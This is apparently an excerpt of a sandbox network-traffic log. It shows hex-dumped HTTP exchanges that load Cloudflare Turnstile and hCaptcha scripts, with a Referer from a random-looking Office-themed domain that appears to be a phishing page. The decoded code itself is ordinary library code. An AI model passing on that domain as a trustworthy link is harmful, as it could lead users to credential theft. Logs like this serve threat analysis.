2025-01-15 14:12:12 UTC	471	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:12 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47521 Connection: close accept-ranges: bytes last-modified: Wed, 08 Jan 2025 13:42:47 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 9026759baebc42af-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:12 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)\|\|jt(e,r)\|\|zt(e,r)\|\|qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J\|\|(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var pe;(fu
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK\|\|e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null\|\|r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null\|\|n===void 0?void
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
2025-01-15 14:12:12 UTC	1369	IN	Data Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:13 UTC	793	OUT	GET /captcha/v1/41c61f4f356516806017107484a3b43e62b92b84/static/hcaptcha.html HTTP/1.1 Host: newassets.hcaptcha.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://office.95pib2ozwrw4w2b4t1ubrxpjc76dos3nophvirht.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:13 UTC	572	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 vary: accept-encoding vary: Origin alt-svc: h3=":443"; ma=86400 CF-Cache-Status: HIT Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff Content-Security-Policy: report-uri https://sentry.hcaptcha.com/api/6/security/?sentry_key=30910f52569b4c17b1081ead2dae43b4&sentry_environment=prod&sentry_release=csp1; Server: cloudflare CF-RAY: 9026759efdffc35d-EWR
2025-01-15 14:12:13 UTC	797	IN	Data Raw: 37 64 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 69 64 3d 22 68 63 61 70 74 63 68 61 2d 66 72 61 6d 65 2d 34 31 63 36 31 66 34 66 33 35 36 35 31 36 38 30 36 30 31 37 31 30 37 34 38 34 61 33 62 34 33 65 36 32 62 39 32 62 38 34 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 68 43 61 70 74 63 68 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d Data Ascii: 7d59<!DOCTYPE html><html lang="en" data-id="hcaptcha-frame-41c61f4f356516806017107484a3b43e62b92b84"><head> <title>hCaptcha</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 30 70 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 69 6e 70 75 74 3a 66 6f 63 75 73 2c 73 65 6c 65 63 74 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 30 7d 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 30 7d 74 65 78 74 61 72 65 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 6f 75 74 6c 69 6e 65 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 72 65 73 69 7a 65 3a 6e 6f 6e 65 7d 2e 6e 6f 2d 73 65 6c 65 63 74 69 Data Ascii: n:0;padding:15px 20px;border:none}button:focus,input:focus,select:focus,textarea:focus{outline:0}:focus{border:none;outline:0}textarea{border:none;overflow:auto;outline:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;resize:none}.no-selecti
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 69 66 28 21 74 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 69 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 79 70 65 6f 66 20 74 2b 22 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 28 63 61 6e 6e 6f 74 20 72 65 61 64 20 70 72 6f 70 65 72 74 79 20 53 79 6d 62 6f 6c 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 29 29 22 29 29 3b 76 61 72 20 6e 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 3b 69 66 28 30 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 28 5b 5d 29 3b 76 61 72 20 72 3d 6e 2e 6c 65 6e 67 74 68 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 69 29 7b 69 66 28 69 26 26 28 22 6f 62 6a 65 63 74 22 3d 3d 74 Data Ascii: if(!t\|\|"undefined"==typeof t.length)return i(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var n=Array.prototype.slice.call(t);if(0===n.length)return e([]);var r=n.length;function o(t,i){if(i&&("object"==t
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 20 69 6e 73 74 61 6e 63 65 6f 66 20 73 29 72 65 74 75 72 6e 20 74 2e 5f 73 74 61 74 65 3d 33 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 76 6f 69 64 20 68 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 29 72 65 74 75 72 6e 20 76 6f 69 64 20 66 28 28 6e 3d 69 2c 72 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 61 70 70 6c 79 28 72 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2c 74 29 7d 74 2e 5f 73 74 61 74 65 3d 31 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 68 28 74 29 7d 63 61 74 63 68 28 6f 29 7b 63 28 74 2c 6f 29 7d 76 61 72 20 6e 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 63 28 74 2c 65 29 7b 74 2e 5f 73 74 61 74 65 3d 32 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 68 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 32 3d 3d 3d 74 2e 5f 73 74 61 Data Ascii: instanceof s)return t._state=3,t._value=e,void h(t);if("function"==typeof i)return void f((n=i,r=e,function(){n.apply(r,arguments)}),t)}t._state=1,t._value=e,h(t)}catch(o){c(t,o)}var n,r}function c(t,e){t._state=2,t._value=e,h(t)}function h(t){2===t._sta
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 3d 3d 3d 73 3f 74 3a 6e 65 77 20 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 74 29 7d 29 29 7d 2c 73 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 69 28 74 29 7d 29 29 7d 2c 73 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 69 66 28 21 72 28 74 29 29 72 65 74 75 72 6e 20 69 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 2e 72 61 63 65 20 61 63 63 65 70 74 73 20 61 6e 20 61 72 72 61 79 22 29 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 6f 3d 74 2e 6c 65 6e 67 74 68 3b 6e 3c 6f 3b 6e 2b 2b 29 73 2e 72 65 73 6f 6c 76 65 28 74 5b 6e 5d 29 2e 74 68 Data Ascii: ===s?t:new s((function(e){e(t)}))},s.reject=function(t){return new s((function(e,i){i(t)}))},s.race=function(t){return new s((function(e,i){if(!r(t))return i(new TypeError("Promise.race accepts an array"));for(var n=0,o=t.length;n<o;n++)s.resolve(t[n]).th
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 72 72 61 79 28 74 29 29 66 6f 72 28 76 61 72 20 65 3d 74 3b 65 2e 6c 65 6e 67 74 68 3b 29 74 68 69 73 2e 74 6f 6b 65 6e 73 2e 75 6e 73 68 69 66 74 28 65 2e 73 68 69 66 74 28 29 29 3b 65 6c 73 65 20 74 68 69 73 2e 74 6f 6b 65 6e 73 2e 75 6e 73 68 69 66 74 28 74 29 7d 7d 3b 76 61 72 20 76 3d 2d 31 3b 66 75 6e 63 74 69 6f 6e 20 77 28 74 2c 65 29 7b 69 66 28 74 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 44 65 63 6f 64 65 72 20 65 72 72 6f 72 22 29 3b 72 65 74 75 72 6e 20 65 7c 7c 36 35 35 33 33 7d 66 75 6e 63 74 69 6f 6e 20 78 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 53 74 72 69 6e 67 28 74 29 2e 74 72 69 6d 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 Data Ascii: rray(t))for(var e=t;e.length;)this.tokens.unshift(e.shift());else this.tokens.unshift(t)}};var v=-1;function w(t,e){if(t)throw TypeError("Decoder error");return e\|\|65533}function x(t){return t=String(t).trim().toLowerCase(),Object.prototype.hasOwnProperty
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 22 29 3b 65 3d 79 28 65 29 2c 74 68 69 73 2e 5f 65 6e 63 6f 64 69 6e 67 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 65 6e 63 6f 64 65 72 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 64 6f 5f 6e 6f 74 5f 66 6c 75 73 68 3d 21 31 2c 74 68 69 73 2e 5f 66 61 74 61 6c 3d 65 2e 66 61 74 61 6c 3f 22 66 61 74 61 6c 22 3a 22 72 65 70 6c 61 63 65 6d 65 6e 74 22 3b 76 61 72 20 69 3d 74 68 69 73 3b 69 66 28 65 2e 4e 4f 4e 53 54 41 4e 44 41 52 44 5f 61 6c 6c 6f 77 4c 65 67 61 63 79 45 6e 63 6f 64 69 6e 67 29 7b 76 61 72 20 6e 3d 78 28 74 3d 74 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 53 74 72 69 6e 67 28 74 29 3a 41 29 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 22 72 65 70 6c 61 63 65 6d 65 6e 74 22 3d 3d 3d 6e 2e 6e 61 6d 65 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 6e Data Ascii: ");e=y(e),this._encoding=null,this._encoder=null,this._do_not_flush=!1,this._fatal=e.fatal?"fatal":"replacement";var i=this;if(e.NONSTANDARD_allowLegacyEncoding){var n=x(t=t!==undefined?String(t):A);if(null===n\|\|"replacement"===n.name)throw RangeError("Un
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 53 2e 70 72 6f 74 6f 74 79 70 65 2c 22 66 61 74 61 6c 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 66 61 74 61 6c 22 3d 3d 3d 74 68 69 73 2e 5f 65 72 72 6f 72 5f 6d 6f 64 65 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 53 2e 70 72 6f 74 6f 74 79 70 65 2c 22 69 67 6e 6f 72 65 42 4f 4d 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 67 6e 6f 72 65 42 4f 4d 7d 7d 29 29 2c 53 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3b 69 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 Data Ascii: t.defineProperty(S.prototype,"fatal",{get:function(){return"fatal"===this._error_mode}}),Object.defineProperty(S.prototype,"ignoreBOM",{get:function(){return this._ignoreBOM}})),S.prototype.decode=function(t,e){var i;i="object"==typeof t&&t instanceof Arr
